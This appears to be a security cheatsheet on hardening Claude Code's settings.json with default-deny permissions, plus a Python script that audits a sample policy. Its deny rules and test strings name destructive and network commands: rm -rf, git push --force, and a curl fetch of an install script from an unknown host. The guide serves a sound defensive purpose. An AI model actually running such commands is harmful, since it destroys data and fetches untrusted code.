CLAUDE-CODE PUB_DATE: 2026.03.23

HARDEN CLAUDE CODE WITH A SAFER SETTINGS.JSON

A practical cheatsheet shows how to harden Claude Code's settings.json to reduce risky shell, file, and network actions.

If you reflexively approve prompts, a code agent can run destructive commands. This hardening cheatsheet walks through locking down permissions, default-deny policies, and safer approvals.

It suggests scoping shell commands, adding guardrails for Git and package managers, and requiring review for file writes and external calls.

Treat editor settings like policy-as-code so teams can standardize safer defaults across repos and environments.

[ WHY_IT_MATTERS ]
01. Code agents can run destructive or networked actions; locked-down defaults reduce blast radius.

02. Team-wide templates stop accidental approvals and align developer environments with security controls.

[ WHAT_TO_TEST ]
  • Create a restricted settings.json and try typical workflows (build, test, git, package installs) to find the minimum necessary permissions.

  • Simulate risky actions (rm -rf, git push --force, curl to unknown hosts) and confirm they are blocked or require explicit review.
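
One way to run the second check in CI before a template ships, as an added example that is not from the cheatsheet or from Claude Code itself: it evaluates a constructed policy against the risky commands listed above. The rule strings use the permissions.allow / ask / deny layout with Bash(<prefix>:*) patterns; the matcher is a simplified prefix check and the "ask" fallback for unmatched commands assumes the default permission mode.

```python
import json

# Constructed sample policy (not an official template).
SETTINGS = json.loads("""
{
  "permissions": {
    "allow": ["Bash(npm run test:*)", "Bash(git status)", "Bash(git diff:*)"],
    "ask":   ["Bash(git push:*)", "Bash(npm install:*)"],
    "deny":  ["Bash(rm -rf:*)", "Bash(git push --force:*)", "Bash(curl:*)"]
  }
}
""")

def bash_rule_matches(rule, command):
    """Simplified matcher (assumption): 'Bash(x:*)' is a prefix rule, 'Bash(x)' is exact."""
    if not (rule.startswith("Bash(") and rule.endswith(")")):
        return False
    pattern = rule[5:-1]
    if pattern.endswith(":*"):
        prefix = pattern[:-2]
        return command == prefix or command.startswith(prefix + " ")
    return command == pattern

def decide(settings, command):
    """Return 'deny', 'ask' or 'allow'; unmatched commands fall back to 'ask'."""
    perms = settings.get("permissions", {})
    for verdict in ("deny", "ask", "allow"):  # deny wins, then ask, then allow
        if any(bash_rule_matches(r, command) for r in perms.get(verdict, [])):
            return verdict
    return "ask"

def audit(settings, risky_commands):
    """List the risky commands this policy would run without any review."""
    return [c for c in risky_commands if decide(settings, c) == "allow"]

# Constructed test commands mirroring the risky actions named above.
RISKY = ["rm -rf /tmp/build", "git push --force origin main",
         "curl http://unknown.example/install.sh"]

if __name__ == "__main__":
    for cmd in RISKY + ["npm run test", "git push origin feature"]:
        print(f"{decide(SETTINGS, cmd):5}  {cmd}")
    print("unreviewed risky commands:", audit(SETTINGS, RISKY))
```

In this matcher prefix rules are literal, so "rm -fr /tmp/build" does not hit the Bash(rm -rf:*) deny rule and only the fallback catches it; a non-empty audit() result is the signal to fail the build.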

[ BROWNFIELD_PERSPECTIVE ]

Legacy codebase integration strategies...

  • 01. Ship an org-approved settings.json via repo workspace settings and dotfiles; audit exceptions during rollout.

  • 02. Pair with pre-commit and branch protections so bypassing the agent still hits safeguards.

[ GREENFIELD_PERSPECTIVE ]

Fresh architecture paradigms...

  • 01. Start projects with a default-deny settings template and narrow permissions per service.

  • 02. Use dev containers to give the agent only the files and tools it needs.
